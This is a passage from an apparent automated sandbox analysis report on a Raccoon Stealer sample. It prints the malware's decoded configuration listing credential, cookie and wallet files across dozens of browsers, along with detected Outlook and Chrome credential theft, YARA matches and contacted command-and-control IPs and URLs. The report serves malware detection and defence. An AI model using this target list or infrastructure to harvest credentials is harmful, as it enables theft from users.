Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, 00000001.00000002.327203361.0000000002D10000.00000004.00000001.sdmp String found in binary or memory: {"_id":"45FBKXwB3dP17SpzZps0","au":"/l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67","ls":"/l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1","ip":"185.189.150.72","location":{"country":"Switzerland","country_code":"CH","state":"Zurich","state_code":"ZH","city":"Zurich","zip":8001,"latitude":47.3664,"longitude":8.5546},"c":{"m":null,"t":null,"lu":null},"lu":null,"rm":1,"is_screen_enabled":0,"is_history_enabled":0,"depth":3,"s":[{"k":"edge","v":"28;Microsoft Edge;\\Microsoft\\Edge\\User Data;Login Data;Cookies;Web Data"},{"k":"chrome","v":"28;Google Chrome;\\Google\\Chrome\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeBeta","v":"28;Google Chrome Beta;\\Google\\Chrome Beta\\User Data;Login Data;Cookies;Web Data"},{"k":"chromeSxS","v":"28;Google Chrome SxS;\\Google\\Chrome SxS\\User Data;Login Data;Cookies;Web Data"},{"k":"chromium","v":"28;Chromium;\\Chromium\\User Data;Login Data;Cookies;Web Data"},{"k":"xpom","v":"28;Xpom;\\Xpom\\User Data;Login Data;Cookies;Web Data"},{"k":"comodo","v":"28;Comodo Dragon;\\Comodo\\Dragon\\User Data;Login Data;Cookies;Web Data"},{"k":"amigo","v":"28;Amigo;\\Amigo\\User Data;Login Data;Cookies;Web Data"},{"k":"orbitum","v":"28;Orbitum;\\Orbitum\\User Data;Login Data;Cookies;Web Data"},{"k":"bromium","v":"28;Bromium;\\Bromium\\User Data;Login Data;Cookies;Web Data"},{"k":"brave","v":"28;Brave;\\BraveSoftware\\Brave-Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"nichrome","v":"28;Nichrome;\\Nichrome\\User Data;Login Data;Cookies;Web Data"},{"k":"rockmelt","v":"28;RockMelt;\\RockMelt\\User Data;Login Data;Cookies;Web Data"},{"k":"360browser","v":"28;360Browser;\\360Browser\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"vivaldi","v":"28;Vivaldi;\\Vivaldi\\User Data;Login Data;Cookies;Web Data"},{"k":"go","v":"28;Go;\\Go!\\User Data;Login Data;Cookies;Web Data"},{"k":"sputnik","v":"28;Sputnik;\\Sputnik\\Sputnik\\User Data;Login Data;Cookies;Web Data"},{"k":"kometa","v":"28;Kometa;\\Kometa\\User Data;Login Data;Cookies;Web Data"},{"k":"uran","v":"28;Uran;\\uCozMedia\\Uran\\User Data;Login Data;Cookies;Web Data"},{"k":"qipSurf","v":"28;QIP Surf;\\QIP Surf\\User Data;Login Data;Cookies;Web Data"},{"k":"epicprivacy","v":"28;Epic Privacy;\\Epic Privacy Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"coccoc","v":"28;CocCoc;\\CocCoc\\Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"centbrowser","v":"28;CentBrowser;\\CentBrowser\\User Data;Login Data;Cookies;Web Data"},{"k":"7star","v":"28;7Star;\\7Star\\7Star\\User Data;Login Data;Cookies;Web Data"},{"k":"elements","v":"28;Elements;\\Elements Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"torbro","v":"28;TorBro;\\TorBro\\Profile;Login Data;Cookies;Web Data"},{"k":"suhba","v":"28;Suhba;\\Suhba\\User Data;Login Data;Cookies;Web Data"},{"k":"saferbrowser","v":"28;Safer Browser;\\Safer Technologies\\Secure Browser\\User Data;Login Data;Cookies;Web Data"},{"k":"mustang","v":"28;Mustang;\\Rafotech\\Must
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.14529.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior

Remote Access Functionality:

barindex
Yara detected Raccoon Stealer
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.2200000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.SecuriteInfo.com.W32.AIDetect.malware1.14529.exe.5d0e50.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.326491431.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.326614932.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.297061443.0000000002200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe PID: 7124, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 491833 Sample: SecuriteInfo.com.W32.AIDete... Startdate: 27/09/2021 Architecture: WINDOWS Score: 100 30 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->30 32 Found malware configuration 2->32 34 Multi AV Scanner detection for submitted file 2->34 36 4 other signatures 2->36 7 SecuriteInfo.com.W32.AIDetect.malware1.14529.exe 80 2->7         started        process3 dnsIp4 26 185.138.164.150, 49745, 80 DEPTELECOMNSO-ASRU Germany 7->26 28 t.me 149.154.167.99, 443, 49744 TELEGRAMRU United Kingdom 7->28 18 C:\Users\user\AppData\...\vcruntime140.dll, PE32 7->18 dropped 20 C:\Users\user\AppData\...\ucrtbase.dll, PE32 7->20 dropped 22 C:\Users\user\AppData\...\softokn3.dll, PE32 7->22 dropped 24 56 other files (none is malicious) 7->24 dropped 38 Detected unpacking (changes PE section rights) 7->38 40 Detected unpacking (overwrites its own PE header) 7->40 42 Tries to steal Mail credentials (via file access) 7->42 44 2 other signatures 7->44 12 cmd.exe 1 7->12         started        file5 signatures6 process7 process8 14 conhost.exe 12->14         started        16 timeout.exe 1 12->16         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.138.164.150
 unknown Germany
50451 DEPTELECOMNSO-ASRU true
149.154.167.99
 t.me United Kingdom
62041 TELEGRAMRU false

Contacted Domains

Name IP Active
t.me 149.154.167.99 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.138.164.150//l/f/45FBKXwB3dP17SpzZps0/adb13c803533173abdcd87ee671f425ca0cf7b67 true
  • Avira URL Cloud: safe
 unknown
http://185.138.164.150/ true
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://t.me/agrybirdsgamerept false
    		high
    http://185.138.164.150//l/f/45FBKXwB3dP17SpzZps0/9b41c3b8b157b1c7fef44a61865b03447a89e8d1 true
    • Avira URL Cloud: safe
    		 unknown